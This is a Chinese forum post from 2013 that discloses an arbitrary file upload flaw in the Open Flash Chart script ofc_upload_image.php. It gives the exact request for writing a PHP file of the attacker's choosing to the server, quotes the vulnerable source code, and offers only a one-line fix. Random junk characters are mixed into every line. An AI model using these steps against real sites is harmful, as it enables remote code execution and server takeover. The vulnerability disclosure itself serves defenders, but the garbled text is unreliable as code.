POST 数据漏洞文件执行任意后缀文件保存( f5 B8 N4 ^9 l# q
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
" h( f3 L8 ?/ `. c0 g0 Z& G6 v$ S/ w. M3 u. q6 J6 @
利用:
4 Z5 G) x1 k2 j. r# f8 o/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名, j3 T8 W; {1 K, d Q# c
* F8 F; `" S) `$ @* a; QPost任意数据: e9 `9 F$ j8 _) R1 a+ H# O
保存位置http://localhost/chart/tmp-upload-images/hfy.php' t) ~" |2 y( Y+ k/ c; x
1 p: k0 {. q0 o! \. U- V; C, j
, V( }& A9 y4 a' T$ o0 q
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~9 N# I5 u! d3 B2 `
: X0 K' @' ^7 i% J+ @1 G; e
<?php
9 j/ B3 [! T' P. f+ |) {' t, M$ g
4 o3 I( t) ?, f) @5 ]: U//* |% _, w9 {3 k l
// In Open Flash Chart -> save_image debug mode, you
+ X' a! I) J& A# v- H// will see the 'echo' text in a new window.
; \- f3 w- I; }3 H) o//
0 K2 i8 n! V$ y3 I' ^" O+ K/ G* _
: ?. @9 `4 r( u0 O, K/*3 h i. u7 k, s6 _4 Q' G
# j0 K2 z. z, l' h- P$ T
print_r( $_GET );1 }3 f2 n6 w& E- J
print_r( $_POST );
G2 c) l" B) S- Y- Zprint_r( $_FILES );
* \& }* _/ B4 A: ^/ V! ~7 b$ z. `* r5 `
print_r( $GLOBALS );
5 l: ?- k6 w5 `- `7 H7 v" T0 Z) zprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
3 S. i9 g. v7 U$ n4 ?" ]
' l$ ^8 b, O. b. e" d' J, k* U*/
# G$ u* J. y! d, N% ]( l// default path for the image to be stored //, {8 P! t% h) G& a. |
$default_path = '../tmp-upload-images/';; F9 k7 e8 O' }0 U' i
3 |5 ]# }) ^( Q; K7 O& b1 ~, M' |3 b1 F
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
8 j! H& a. C$ J' J; t- g* v8 S
7 ~+ }4 b5 h+ q// full path to the saved image including filename //, c& D& X- v$ a& |% |
$destination = $default_path . basename( $_GET[ 'name' ] );
i- ^7 ]. s) Y4 ^& t$ a4 A+ j8 e H
echo 'Saving your image to: '. $destination;8 q- H9 j3 \2 [% S% w9 R
// print_r( $_POST );* x3 w# a, k& ]; t, y
// print_r( $_SERVER );
z/ a) e1 k* P// echo $HTTP_RAW_POST_DATA;
& l. N& R' c8 d1 p0 E6 Y& X# ]0 `3 a2 ], ?1 M5 v7 I1 g
//) `7 K/ @. Y# ~. I
// POST data is usually string data, but we are passing a RAW .png
) ~5 o7 g: s! \# j2 [% ^$ ~5 m* v// so PHP is a bit confused and $_POST is empty. But it has saved0 Q8 R0 H v# D; Q$ u# b
// the raw bits into $HTTP_RAW_POST_DATA
# D) {. x V7 ~7 T `//9 f/ k" `+ `0 V3 C; W& p
; P, n: i0 |8 x' u7 w. L; f
$jfh = fopen($destination, 'w') or die("can't open file");
4 e+ K6 A5 o3 a% ]* G6 dfwrite($jfh, $HTTP_RAW_POST_DATA);* R, p8 H2 X- q( A& U
fclose($jfh);; C* k% N K# T/ v% {% ]
$ R# f8 d5 R# M D/ V: O
//
7 p0 q) h* {3 `! l, a' {5 a6 a// LOOK:
9 F U. ?8 g3 e//: T) p. F# _' x; j
exit();5 \- O/ w7 U( i: d% x2 n# _
//4 ]3 P# q, x9 v5 z4 {
// PHP5:% ] Y! n! C0 M. O2 b
//
' X6 }7 {- |3 X, }: `+ c! i5 @; K' B5 Z* {# z' l( z
' v5 m5 N2 \3 s. k9 C8 q5 T; Y// default path for the image to be stored //
; O8 l/ w7 i6 Z6 C" i3 B$default_path = 'tmp-upload-images/';' q4 t3 h4 b) f
& w! F$ Z) x( q6 t5 U
if (!file_exists($default_path)) mkdir($default_path, 0777, true);$ v: Y! J* M% t0 ~& s( @+ U1 `
p* {& {: {! u5 q4 D' s. z
// full path to the saved image including filename //
( x7 r# O) U: L$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); 7 ^5 U7 }$ q K
" L7 }- K( l6 V" e" s8 Z# ]
// move the image into the specified directory //) d8 v" N6 M. s: _. C& q2 z z
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {8 W! w/ o8 Y9 B; P, F' h
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
! v/ h. D: D# M$ O} else {% Q- z* f8 D, f# F; Q" u" n* p! u4 I
echo "FILE UPLOAD FAILED";
8 r7 V! b* x) d9 e}
) R6 Y% n3 d. F, j" m' l9 k2 w$ E& M l
6 {1 ?! m1 `" G- `6 c
?>( u- J2 E7 j$ j1 F
) f: u( V3 N1 w' x5 W2 e
7 }0 g$ D( t1 a4 e, {
6 i% _' a1 s. [1 V
6 |6 R$ @# Z5 H" H o' e4 I
' {- i3 r+ ?2 i! y2 \& q) o$ I0 {7 w: t b0 t( k, Y
修复方案: / K! [8 t& }. J0 e6 c8 s+ R1 D
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
- ~/ e; V8 M9 B) l( H" N2 Z
* U3 n2 Y# y* @
' C! t! I9 ]0 e# a2 U
2 \' j0 b; @7 D, q9 m* h+ D) f/ M/ S
|
发表于 2013-2-23 12:38:58
收藏
支持
反对